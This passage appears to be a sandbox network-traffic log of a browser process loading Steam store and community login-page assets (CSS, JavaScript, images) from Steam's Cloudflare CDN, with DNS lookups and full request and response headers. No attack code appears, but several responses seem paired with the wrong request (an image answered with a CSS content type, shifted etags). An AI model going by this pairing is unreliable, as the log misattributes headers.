strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 5338
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b703893f668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/libraries~9229560c0.js?contenthash=c68de68ac560bab9afe1

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/store/libraries~9229560c0.js?contenthash=c68de68ac560bab9afe1 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:52 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 26 Sep 2023 22:55:07 GMT
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:56:36 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 1980491
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b7125c32668b-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/chunk~a668b8b40.js?contenthash=c6d55eaa02144af399b5

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/store/chunk~a668b8b40.js?contenthash=c6d55eaa02144af399b5 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:56 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 26 Sep 2023 22:55:07 GMT
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:56:36 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 1974869
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b7262bef668b-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/chunk~9c591d16d.js?contenthash=61a3d5bebdea801c5fda

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/store/chunk~9c591d16d.js?contenthash=61a3d5bebdea801c5fda HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:49:00 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 26 Sep 2023 22:55:07 GMT
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:56:36 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 1989194
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b73fdf43668b-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/css/applications/store/chunk~9229560c0.css?contenthash=abbdd20a2e9abb001e29

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/applications/store/chunk~9229560c0.css?contenthash=abbdd20a2e9abb001e29 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:49:04 GMT
content-type: text/css;charset=UTF-8
last-modified: Tue, 10 Oct 2023 22:56:10 GMT
cache-control: public,max-age=15552000
expires: Sun, 07 Apr 2024 22:57:45 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 1669876
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b75c9e2b668b-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/chunk~9229560c0.js?contenthash=459f28cb0ff3e262ab3e

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/store/chunk~9229560c0.js?contenthash=459f28cb0ff3e262ab3e HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:49:04 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 26 Sep 2023 22:55:07 GMT
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:56:36 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 1974363
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b75c9e31668b-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/css/applications/store/login.css?contenthash=38bbe7298529efbe4cc8

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/applications/store/login.css?contenthash=38bbe7298529efbe4cc8 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:49:04 GMT
content-type: text/css;charset=UTF-8
last-modified: Wed, 28 Jun 2023 04:07:18 GMT
cache-control: public,max-age=15552000
expires: Thu, 04 Apr 2024 04:01:52 GMT
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 1989826
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b75c9e2f668b-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/login.js?contenthash=513568273e5ce33d7b19

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/store/login.js?contenthash=513568273e5ce33d7b19 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:49:04 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 10 Oct 2023 22:56:10 GMT
cache-control: public,max-age=15552000
expires: Sun, 07 Apr 2024 22:57:45 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 1669876
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b75c9e2d668b-AMS
content-encoding: gzip
DNS

151.145.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

151.145.64.172.in-addr.arpa

IN PTR

Response
DNS

community.cloudflare.steamstatic.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

community.cloudflare.steamstatic.com

IN A

Response

community.cloudflare.steamstatic.com

IN A

172.64.145.151

community.cloudflare.steamstatic.com

IN A

104.18.42.105
GET

https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 638
cache-control: public,max-age=15552000
expires: Mon, 15 Jan 2024 07:32:30 GMT
etag: "GfSjbGKcNYaQ"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 782258
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63569fe0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=uR_4hRD_HUln&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/buttons.css?v=uR_4hRD_HUln&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 3537
cache-control: public,max-age=15552000
expires: Wed, 14 Feb 2024 14:28:33 GMT
etag: "uR_4hRD_HUln"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 782195
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6384d5f0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Fd2aj_zaBVQV&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/shared_global.css?v=Fd2aj_zaBVQV&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 18053
cache-control: public,max-age=15552000
expires: Sun, 10 Mar 2024 22:39:39 GMT
etag: "Fd2aj_zaBVQV"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: HIT
cf-cache-status: HIT
age: 4090117
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6384d600bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=RL7hpFRFPE4A&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/globalv2.css?v=RL7hpFRFPE4A&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 12460
cache-control: public,max-age=15552000
expires: Sun, 10 Sep 2023 23:09:28 GMT
etag: "RL7hpFRFPE4A"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 8686077
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6385d6e0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/css/login.css?v=0H1th98etnSV&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/login.css?v=0H1th98etnSV&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 3989
cache-control: public,max-age=15552000
expires: Sun, 18 Feb 2024 23:30:55 GMT
etag: "0H1th98etnSV"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 5901429
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6385d700bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/css/skin_1/home.css?v=-6qQi3rZclGf&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/skin_1/home.css?v=-6qQi3rZclGf&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 3016
cache-control: public,max-age=15552000
expires: Mon, 15 Apr 2024 04:36:31 GMT
etag: "-6qQi3rZclGf"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 781588
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6386d760bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 5743
cache-control: public,max-age=15552000
expires: Sun, 01 Oct 2023 23:00:01 GMT
etag: "KrKRjQbCfNh0"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 3405020
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6387d800bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/javascript;charset=UTF-8
content-length: 37365
cache-control: public,max-age=15552000
expires: Thu, 28 Dec 2023 05:12:48 GMT
etag: ".55t44gwuwgvw"
last-modified: Fri, 05 Jan 2018 01:34:51 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 782195
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6387d820bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/javascript;charset=UTF-8
content-length: 28116
cache-control: public,max-age=15552000
expires: Sun, 03 Sep 2023 02:20:23 GMT
etag: "OeNIgrpEF8tL"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 14606315
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6387d830bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=english&_cdn=cloudflare&load=effects,controls,slider,dragdrop

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=english&_cdn=cloudflare&load=effects,controls,slider,dragdrop HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 3668
cache-control: public,max-age=15552000
expires: Sun, 17 Dec 2023 22:55:18 GMT
etag: "vh4BMeDcNiCU"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 11346777
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6387d810bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=E78TCC6Eu4d1&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/global.js?v=E78TCC6Eu4d1&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 33169
cache-control: public,max-age=15552000
expires: Thu, 28 Dec 2023 05:12:49 GMT
etag: ".isFTSRckeNhC"
last-modified: Fri, 05 Jan 2018 01:34:51 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 782196
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6387d8d0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 24136
cache-control: public,max-age=15552000
expires: Sun, 04 Feb 2024 22:48:06 GMT
etag: "E78TCC6Eu4d1"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 7113612
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6387d8b0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 36765
cache-control: public,max-age=15552000
expires: Sun, 10 Mar 2024 22:39:39 GMT
etag: "joUly9uZoJX_"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 4090118
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6388d930bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=joUly9uZoJX_&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/shared_global.js?v=joUly9uZoJX_&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 4229
cache-control: public,max-age=15552000
expires: Mon, 11 Mar 2024 23:24:48 GMT
etag: ".zYHOpI1L3Rt0"
last-modified: Tue, 22 Mar 2022 23:23:42 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 782196
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6388d920bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/javascript/login.js?v=Vbm1kuHoXmMB&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/login.js?v=Vbm1kuHoXmMB&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 10896
cache-control: public,max-age=15552000
expires: Tue, 19 Mar 2024 19:01:26 GMT
etag: "Vbm1kuHoXmMB"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 3325610
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63cf9a40bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 6238
cache-control: public,max-age=15552000
expires: Sat, 04 Nov 2023 23:02:58 GMT
etag: "pSvIAKtunfWg"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 15060144
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dfaf30bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/responsive/logo_valve_footer.png HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/css;charset=UTF-8
content-length: 29035
cache-control: public,max-age=15552000
expires: Sun, 21 Apr 2024 22:54:45 GMT
etag: "2GlUT7rXfQte"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 460409
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dfb050bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/responsive/header_menu_hamburger.png HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 6585
cache-control: public,max-age=15552000
expires: Tue, 23 Apr 2024 22:38:46 GMT
etag: "EzpNioPgQ-Tc"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 288569
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dfb070bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/responsive/header_logo.png HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: image/png
content-length: 3737
last-modified: Fri, 05 Jan 2018 01:34:51 GMT
etag: "5a4ed63b-e99"
x-cache: MISS
cf-cache-status: HIT
age: 1112
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dfb110bdc-AMS
GET

